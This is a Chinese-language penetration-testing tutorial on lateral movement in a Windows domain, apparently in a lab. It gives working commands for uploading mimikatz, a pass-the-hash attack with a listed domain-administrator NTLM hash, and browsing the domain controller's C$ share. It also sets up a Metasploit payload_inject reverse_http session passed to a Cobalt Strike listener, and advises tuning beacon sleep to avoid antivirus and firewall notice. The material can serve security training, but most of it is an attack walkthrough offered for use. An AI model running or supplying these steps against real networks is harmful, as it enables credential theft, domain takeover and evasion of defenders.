内网渗透

内网横向渗透

在对内网主机进行信息收集后,接下来我们就是要对内网主机发动攻击。

哈希传递攻击

在域环境内,只有获得了域管理员的哈希才可以攻击。我们得到了域管理员administrator的哈希,在这里我们就可以用哈希传递攻击了。

在前面获得了域管理员 administrator 的NTLM哈希为:a4ee66cc11243b7741dbb83262e7eba4

NTLM: 就是NT的哈希值,前面的章节已经介绍过

哈希传递工具 必须借助mimikatz

Mimikatz是一款可以抓取系统内的明文密码的工具

通过蚁剑上传到 web目录

在meterpreter中运行。

1
2
3
 shell
chcp 65001
cd c:\phpstudy\www

运行命令

1
2
mimikatz.exe
privilege::debug #提升权限
1
2
3
#开始 Pass-The-Hash(hash传递攻击域控服务器  也就是 192.168.52.138)
#格式sekurlsa::pth /user: 用户名 /domain:域控名 /ntlm: NTLM哈希
sekurlsa::pth /user:administrator /domain:"god.org" /ntlm:a4ee66cc11243b7741dbb83262e7eba4

exit 退出

我们直接远程执行 域控服务器上的命令

以下所有的命令是在跳板机上执行。

这里要在中国蚁剑上面执行,在msf里面 会失败

1
2
3
dir \\192.168.52.138\c$       #查看 C盘目录里面的文件  \\就是网络路径   $就是 根目录的意思
或者
dir \\owa\c$

执行第二台机器上的命令

还有其他的攻击方式 ,等我们后面讲完漏洞再去学习。

cobaltstike联动MSF

首先在CobaltStrike上开启一个监听

1
2
3
4
5
6
7
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true #默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于我们已经有了一 个,所以不需要在产生一个,所以这里我们设置为true
set lhost 192.168.59.134 #cobaltstrike监听的ip 就是服务端的IP
set lport 14444 #cobaltstrike监听的端口
set session 1 #这里是获得的session的id
exploit

我们打开cs 可以看到主机已经上线

鼠标右键 —会话交互

因为60秒执行一次命令,要等待的时间太长 我们改为2 秒,实战中不能改的太短,太短会引起防火墙或者杀软注意

在最下面 beacon 输入 sleep2

输入 help查看命令

输入命令 抓取密码

1
输入命令 抓取密码

横向移动:

鼠标右键 网络探测:

这里我们新建一个监听器,这个后面要用

运行完成后要等 几秒

同样的办法横向移动到域控